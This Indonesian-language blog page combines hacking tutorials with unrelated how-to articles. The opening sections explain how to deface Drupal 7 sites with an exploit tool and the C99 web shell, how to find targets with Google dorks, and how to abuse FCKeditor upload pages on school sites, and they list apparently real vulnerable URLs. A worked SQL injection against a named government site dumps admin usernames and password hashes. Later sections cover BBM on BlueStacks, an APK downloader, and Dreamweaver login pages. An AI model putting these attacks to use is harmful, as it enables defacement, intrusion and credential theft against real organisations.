<---A 7 1 P--->

Assalamualaikum.... Kali ini A71P akan menerangkan cara deface site yang menggunakan CMS Drupal 7.x..
Siapkan bahan-bahannya:
1. Drupal Exploiter (Download)
2. C99 Shell (Download)

Biasanya akan berhasil jika menggunakan shell c99

Langkah-Langkah
-------------------
1. Simpan tools exploit diatas dengan ekstensi php dan simpan di hostingan atau di localhost.

1. Google dork;

intext:"powered by drupal" site:id   atau inurl:"node/add/article" site:id

2. Masukkan target dan tekan tombol "suck it ! " (jika berhasil penampakannya seperti dibawah ini)

dan masukkan
user : fuckyou
pass : admin
Titip Nama: Muslim Corporation Cyber # A71P Team # Hidden School Hacker # IFC # TK7 Ippi Team :D :D

Ngga ada habis-habisnya kalo ngebahas soal hacking, Setiap hari berbagai macam exploit ditemukan. Dan sekarang saya akan share cara deface website lagi sob. Tutorial ini saya dapat dari grup facebook Hacker Indonesia. Namun karena masih banyak yang bingung, disini saya akan jelaskan beserta gambarnya.

Anda pasti tau apa itu Hacking website. Ya benar Hacking website adalah Kegiatan menerobos yang dilakukan seseorang untuk mendapatkan info-info dari halaman tersebut. Dan yang melakukan Hacking itu disebut Hacker. Kali ini saya akan membuat sebuah artikel yang tidak jauh dari judul posting ini. Wah judulnya saja udah menarik bukan. Saya akan memberikan tutorial seperti judul diatas yaitu 'Cara Hack Website Sekolah (sch.id) Menggunakan Teknik File Upload'
Pada sebuah website sekolah yang akhiran alamatnya (sch.id) masih memiliki sebuah halaman File Upload yang sangat riskan dapat diterobos para Hacker. Nah pada halaman File Upload ini kita memanfaatkan untuk memasukan sebuah file yang kita buat. Sebuah file yang ber-ektensi (.txt .html .php) dll.
Dan saya akan Upload file ke sebuah website ber-ektensi (.txt).

1. Siapkan file .txt terlebih dahulu.
2. Jika file sudah dibuat, langkah selanjutnya adalah memasukkan Dork ke kotak pencarian  www.google.com Di bawah ini beberapa dork yang akan kita pakai :

• inurl:/html/siswa.php?
• inurl:/html/alumni.php?
• inurl:/html/guru.php? 

3. Oke kita masukan salah satu dork diatas ke kotak pencarian Google. Saya memakai dork yang pertama.


4. Setelah kita memasukkan dork, akan muncul banyak sekali website di pencarian Google. Pilih salah satu website yang akan kita Hack nanti.
5. Setelah memilih salah satu website, kemudian masukan kode di bawah ini setelah akhiran url website.

• /editor/filemanager/connectors/uploadtest.html

Contoh :

• www.sman1kotabaru.sch.id/editor/filemanager/connectors/uploadtest.html 

6. Setelah kita enter akan muncul halaman File Upload.


7. Nah setelah ini, kita akan Upload file yang sudah kita siapkan tadi.
Pada pilihan Asp ganti dengan PHP. Dan pilih telusuri untuk memilih file kita tadi. Kemudian klik Send it to the Server.
8. Jika berhasil akan muncul pesan seperti gambar dibawah ini.


9. Dan kita akan mendapatkan sebuah link hasil Upload kita.


10. Link hasil Upload kita seperti ini. Contoh :

• http://www.sman1kotabaru.sch.id/userfiles/adiardan13.txt

11. Jika link benar dan hasil upload berhasil, akan muncul hasil upload file .txt kita tadi seperti gambar dibawah ini.


12. Selesai.

Cukup mudah bukan tutorial Hack website sekolah teknik file Upload.
Jika masih belum paham,coba dan pahami lagi

nitip nama :./A71P & Big Family Hidden School Hacker

• http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://ns5.freeheberg.com/~dispensa/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://www.dokeos.nrc-gauthey.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://www.ladapt-hn.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://my.eurasiam.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://el.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://www.formation.megalodon.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://www.pharmconseil-elearning.com/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://pro.accru.info/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://www.formation-microkine.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://foad.ina.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://campus.technifutur.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://www.fpafoad22.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://www.ecoleprimaireenligne.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://campus.flone.be/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

• http://www.elearning80.fr/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

Pengertian SQL Injection 

SQL Injection merupakan sebuah teknik hacking dimana seorang penyerang dapat memasukkan perintah-perintah SQL melalui url untuk dieksekusi oleh database. Penyebab utama dari celah ini adalah variable yang kurang di filter : 

id=$id;……. > Got Error

Hal pertama yang harus kita lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter ‘ setelah atau sesudah angka pada url.

Contoh : 
http://situstarget.com/news.php?id=1’ 
http://situstarget.com/news.php?id=’1

Pertama kita cari dulu website yang memiliki celah SQL Injection. silahkan sobat cari target di google dengan menggunakan dork.

Dork SQLi :

inurl:azerty.php?id= ,
inurl:bouquin.php?id= ,
inurl:lien.php?id= ,
inurl:clavier.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:games.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=

Disini saya sudah menemukan targetnya : http://diklat.lampungprov.go.id/more.php?id=1



Kemudian kita akan mencari dan menghitung jumlah tabel yang ada pada database web tersebut. silahkan sobat gunakan perintah : order by 1 - dan seterusnya sampai terjadi error pada halaman. gunaka tanda + sebagai spasi, dan pada akhir perintah gunakan tanda --.

http://diklat.lampungprov.go.id/more.php?id=1+order+by+1-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+2-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+3-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+4-- < No Error
http://diklat.lampungprov.go.id/more.php?id=1+order+by+5-- < No Error [Terlalu banyak diSkip aja]
http://diklat.lampungprov.go.id/more.php?id=1+order+by+17-- < No Error

 
http://diklat.lampungprov.go.id/more.php?id=1+order+by+18-- < Error



Pada angka 18 ternyata muncul error, jadi yang kita ambil angka sebelum munculnya pesan error. itu berarti jumlah tabel pada databasenya ada 17.


Selanjutnya kita akan mencari angka tabel yang bisa kita gunakan untuk perintah2 injection pada tahap selanjutnya. Gunakan perintah union select diikuti jumlah tabel dan tanda - sebelum angka dan diakhiri dengan tanda --. contoh:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--



Disini bisa kita lihat bahwa angka yang muncul yaitu 16 dan 17. kedua angka tersebut nantinya yang akan kita masukkan perintah2 selanjutnya.


Pada tahap Selanjutnya kita akan mengetahui versi database yang dipakai oleh web tersebut. gunakan perintah "version()" atau "@@version".
contoh:
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,@@version,17--




Nah pada gambar kita bisa lihat versi database yang dipake adalah v.5.5.14, jadi pada versi 5 itu berberda dengan versi 4. prosesnya lebih repot pada versi 4, karena untuk melakukan perintah2 SQLi pada versi 4 kita harus menebak 1 per 1 tabel yang ada pada databasenya.

Sekarang perintah selanjutnya kita akan memunculkan nama-nama tabel yang ada pada web tersebut. gunakan perintah “group_concat(table_name)” dan menambahkan perintah “from+information_schema.tables+where+table_schema=database()" sesudah angka terakhir, dan diakhiri dengan tanda --.
contoh :
http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(table_name),17+from+information_schema.tables+where+table_schema=database()--


Disitu kita dapatkan nama-nama tabelnya sperti : tbadmin, tbbukutamu, tbcontent, tbcounter, tbdivisi, tbgolongan, tbjadwal, dll. Langkah selanjutnya kita akan mencari username dan password admin pada tabel tbadmin. Perlu diketahui bahwa tidak semua nama tabel pada setiap web itu sama, jadi untuk mencari tabel admin, silahkan sobat kira-kira saja dimana tabel yang sobat curigai tempat username dan password admin berada. Kemudian untuk mengeluarkan isi yang ada pada kolom tbadmin gunakan perintah berikut: “group_concat(columns_name) ” dan perintah “from+information_schema.columns+where+table_name=CHAR()" sesudah angka terakhir, dan diakhiri dengan tanda --. Pada tahap ini nama tabel tbadmin harus dikonversi dulu ke bentuk decimal :) silahkan sobat gunakan toolsnya DISINI. kemudian hasil konversi tbadmin adalah 116 98 97 100 109 105 110 lalu kita masukkan ke CHAR(116, 98, 97, 100, 109, 105, 110) dan pisahkan dengan koma. jadi perintahnya seperti berikut:

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(column_name),17+from+information_schema.columns+where+table_name=CHAR(116, 98, 97, 100, 109, 105, 110)--


Nah disitu muncul kolom username, pswd, status. lalu langkah selanjutnya kita akan melihat isi dari kolom kolom yang muncul tadi dengan menambah perintah group_concat(username,0x3a,pswd,0x3a,status) . jangan lupa di setiap sela2 tambahkan kode 0x3a yg merupakan hasil konversi hexa dari tanda titik dua ( : ). lalu tambahkan perintah  +from+tbadmin--, tbadmin merupakan tabel yang kita dapatkan tadi.

http://diklat.lampungprov.go.id/more.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,group_concat(username,0x3a,pswd,0x3a,status),17+from+tbadmin--



Nah kan udah keliatan username dan passwordnya.. :) dari gambar muncul data :
user1:8dfad4f7356a2e403c900b2944990ddc:1,user:8dfad4f7356a2e403c900b2944990ddc:0 selanjutnya sobat tinggal mengcrack password yang berbentuk md5 hash tersebut. untuk mengcracknya silahkan gunakan toolsnya disini. Selanjutnya tinggal mencari halaman logginnya. kalo semua sudah ketemu, tinggal loggin aja, jebreet jebreet jebreet :D


Saya kira hanya begitu saja, kurang lebih mohon maaf.. kalo ada kesalahan mohon diperbaiki :) wassalam :*

Setelah peluncuran bbm for android beberapa waktu lalu, banyak yang tertarik untuk mencobanya atau malah rela membeli handheld android terbaru yang ber OS Android 4.0 ke atas (Ice Cream Sandwich dan Jelly Bean). yang merupakan salah satu sarat OS minimum untuk bisa ber BB ria melalui android phone.

tapi bagi yang iseng2 pengen mencoba ber BBm-an ria, sekarang tidak perlu membeli handheld android yang harga nya lumayan buat kantong pas-pasan. Cukup manfaatkan PC atau Laptop dirumah untuk di gunakan ber BBm-an ria. Kalau tidak punya PC atau Laptop dirumah ya terpaksa beli hape android, atau bisa pinjam PC di warnet, Lumayan buat sekedar melampiaskan penasaran bagaimana bentuknya BBM di PC/LAPTOP dengan Bluestack

sekedar catatan, cara ini sudah di coba dan berhasil di Laptop asus A42F ber-OS window7 64-bit RAM 6 Gb, dengan mesin Intel(R) Core(TM) i3 CPU M350@2.27GHz 

CARA MUDAH BBM di PC/LAPTOP dengan BLUESTACKS, begini caranya:

1. Download bluestacks DISINI untuk online installer nya.

2. Setelah selesai download kemudian install bluestacksnya. Mohon bersabar proses ini memakan waktu cukup lama tergantung koneksi yang dipakai. Kurang lebih satu jam dengan speed rata2 150KB/s.

3. Setelah selesai instalasi. Close saja dulu blustacksnya,

4. Update display adapter driver (optional), lalu restart computer/laptop



5. Download file apk BBM DISINI

6. Setelah selesai download, instal file apk nya. 

7. Setelah selesai terinstal, buka bluestacks




8. Klik icon BBm. Silakan login atau create ID baru

9. Selesai CARA MUDAH BBM di PC/LAPTOP dengan BLUESTACKS.
Selamat menikmati BBM-an via pc/laptop


Semoga bermanfaat, BBm dengan CARA MUDAH BBM di PC/LAPTOP dengan BLUESTACKS.

• Google Play Store mendeteksi bahwa aplikasi atau game yang ingin anda download tidak kompatibel dengan perangkat Android anda, meskipun anda yakin bahwa aplikasi tersebut bisa beroperasi di perangkat anda. Contohnya aplikasi APK BBM untuk Android.
• Terkadang sebuah aplikasi Android bisa jadi tidak tersedia untuk di download di Play Store negara / daerah tempat kamu berdomisili.
• Bisa jadi perangkat anda tidak memiliki Play Store, seperti tablet Amazon Kindle.
• Atau juga perangkat anda terdeteksi palsu oleh Play Store, silahkan cek apakah HP Android anda asli atau replika / palsu.

Bagaimana cara download file-file APK dari Google Play Store.

Evozi, seorang developer aplikasi Android, menawarkan aplikasi online untuk download APK secara one-click yang memungkinkan kamu download APK yang terinstall dari aplikasi Android yang terdaftar di Google Play Store, nama layanan ini adalah APK Downloader. Aplikasi downloader dapat di akses melalui apps.evozi.com.

Untuk memulainya anda cukup memasukan alamat URL web dari aplikasi apapun yang terdaftar dari Google Play Store dan klik tombol Generated Download Link. Aplikasi download APK akan menarik file APK dari Google Play Store dan akan menyimpannya kedalam server mereka dari situ kamu bisa download file-nya.

Keuntungan menggunakan APK Downloader.

Dikarenakan file-file APK tersebut langsung di ambil dari Google Play Store, maka kemungkinan besar aplikasi Android tersebut tidak akan terinfeksi oleh malware. 

Dan untuk mencegah masalah hak cipta, APK downloader hanya membolehkan anda untuk download aplikasi dan game gratis dari Google Play Store, bukan aplikasi yang berbayar.

Tentu untuk menggunakan layanan APK Downloader dari Evozi anda tidak perlu terlebih dahuluroot Android anda. Jadi tidak usah khawatir. Cukup memasukan alamat URL dari aplikasi yang ada di Google Play Store yang ingin anda ambil file apk-nya maka beres sudah.

Silahkan ke website APK Downloader miliknya Evozi.

Melindungi halaman admin dengan Username dan Password

Halaman website yang tersimpan dalam folder admin sifatnya adalah rahasia. Semua halaman hanya dapat diakses jika seseorang telah melakukan login dengan username dan password. Oleh karena itu Anda harus melindungi halaman-halaman admin tersebut.
Setiap aktivitas membuka file di halaman admin yang tanpa melalui login dengan username dan password yang benar, maka Anda akan dialihkan ke halaman login. Berikut langkah-langkahnya:

1. Buka file admin.php dengan Dreamweaver Anda
2. Klik Insert > Data Objects > User Authentication > Restric Access To Page. Jendela ini akan keluar, lakukan beberapa setingan berikut ini
3. Restric based on: Username and Password
4. If access denied, go to: login.php. Klik Browse lalu pilih file login.php. Ini artinya ketika halaman admin.php ingin Anda buka dan Anda belum melakukan login dengan username dan password yang benar, maka Anda akan dialihkan ke halaman login.php.
5. Klik  OK untuk menyelesaikannya. Lalu simpan hasil pekerjaan Anda

Lakukan ke-5 langkah di atas untuk melindungi seluruh halaman website yang tersimpan di folder admin, kecuali halaman login.php. Anda tidak harus melindungi halaman login.php dengan username dan password.

Menambahkan dan mengaktifkan link Log Out

Langkah selanjutnya adalah mengaktifkan link Log Out yang ada di halaman admin.php. Berikut adalah langkah-langkahnya.

1. Buka file admin.php 
2. Cari dan seleksi (blok) tulisan Log Out yang berada di sudut kiri bawah sidebar  halaman website Anda. Gunakan Design View untuk melakukannya. Di sana Anda akan menemukan tulisan Log Out dengan gambar merah beserta link berisi tanda kres (#).
3. Klik Insert > Data Objects > User Authentication > Log Out User. Jendela Log Out User akan keluar lalu lakukan konfigurasi.
4. Log Out when: Link Clicked
5. When done, go to: login.php. Klik Browse lalu cari file login.php, ini artinya ketika proses Log Out berhasil dilakukan Anda akan dialihkan ke halaman login.php
6. Klik OK untuk menyelesaiaknnya. Simpan kembali file Anda.

Lakukan ke-6 langkah di atas untuk menambahkan link Log Out ke seluruh halaman website yang tersimpan di folder admin, kecuali halaman login.php. Anda tidak harus menambahkan link Log Out pada halaman login.php.

Membuat halaman login (login.php)

Anda telah berhasil melindungi semua halaman website yang tersimpan dalam folder admin dengan username dan password (kecuali halaman login.php). Langkah selanjutnya Anda akan membuat halaman login dan mengaktifkannya. Bagian ini akan terdiri dari dua tahap, yaitu:

• Membuat form login
• Mengaktifkan form login

Membuat form login:

1. Buka halaman login.php melalui Dreamweaver Anda.
2. Di sana Anda akan menemukan tulisan “Form login di sini”. Hapus tulisan tersebut, di sana Anda akan membuat form login tersebut
3. Klik Insert > Form > Form
4. Klik Insert > Spry > Spry Validation Text Field. Jendela Input Tag akan muncul, lalu isi dengan data berikut ini.
5. ID: username, lalu Label: Username:<br>. Lalu klik OK. Letakkan kursor Anda setelah text field, lalu tekan ENTER
6. Klik Insert > Spry > Spry Validation Password. Jendela Input Tag akan keluar. Lakukan konfigurasi berikut ini
7. ID: password, lalu Label: Password:<br>. Klik OK, letakkan kursor Anda setelah password field, tekan ENTER
8. Klik Insert > Form > Button
9. ID: submit, biarkan Label-nya kosong. Klik OK
10. Klik tombol Submit tersebut, lalu Copy, letakkan kursor Anda di samping kanan dari tombol tersebut, lalu Paste
11. Klik tombol Submit yang baru saja Anda Paste tadi, lalu melalui panel Properties ubah menjadi Reset form
12. Simpan kembali hasil pekerjaan Anda.
13. Mengaktifkan form login

Mengaktifkan form login

Langkah selanjutnya adalah mengaktifkan form login sehingga dapat digunakan dengan baik. Berikut adalah langkah-langkahnya:

1. Pastikan file login.php masih Anda buka
2. Klik Insert > Data Objects > User Authentication > Log In User. Jendela Log In User akan muncul. Lakukan konfigurasi seperti di bawah ini.
3. Get input from form: form1
4. Username field: username
5. Password field: password
6. Validate using connection: cms_blog, klik pop-up menu untuk memilihnya
7. Table: users
8. Username column: username
9. Password column: password
10. If login succeds, go to: index.php, ini artinya jika proses login Anda sukses dan benar, maka Anda akan dialihkan ke halaman index.php. Anda dapat mengklik Browse untuk mencari file index.php
11. Beri tanda checked/centang pada pilihan Go to previous URL (If exists)
12. If login fails, go to: login.php. Ini artinya ketika proses login Anda mengalami kegagalan, Anda akan dikembalikan ke halaman login.
13. Klik OK untuk menyelesaiakannya. Simpan  kembali pekerjaan Anda.
14. Halaman login telah berhasil Anda selesaikan. Jika muncul jendela peringantan Copy Dependent File, klik OK saja

Membuat form tambah berita dan mengaktifkannya (add-news.php)

Anda telah dapat melindungi halaman admin dengan username dan password. Anda juga telah dapat menambahkan dan mengaktifkan link Log Out. Langkah berikutnya adalah bagian utama dari tutorial ini, yaitu aplikasi berita. Akan ada 3 tahap dalam hal ini, yaitu:

• Menampilkan data login, sehingga nantinya siapa yang melakukan posting dan edit berita akan terekam secara otomatis
• Membuat form tambah berita
• Mengaktifkan form tambah berita

Menampilkan data login (siapa yang melakukan login dan menampilkan detailnya) ==> Materi $_SESSION Variable

1. Buka file add-news.php
2. Klik Insert > Data Objects > Recordset. Jendela Recordset akan muncul
3. Name: rsSession (ubahlah defaultnya yang semula Recordset1 menjadi rsSession)
4. Connection: cms_blog
5. Table: users
6. Columns: All
7. Filter: username
8. Ubah URL Parameter menjadi Session Variable
9. Ubah tulisan username menjadi MM_Username (perhatikan besar kecil huruf)
10. Klik OK untuk menyelesaikannya.
11. Simpan kembali hasil pekerjaan Anda.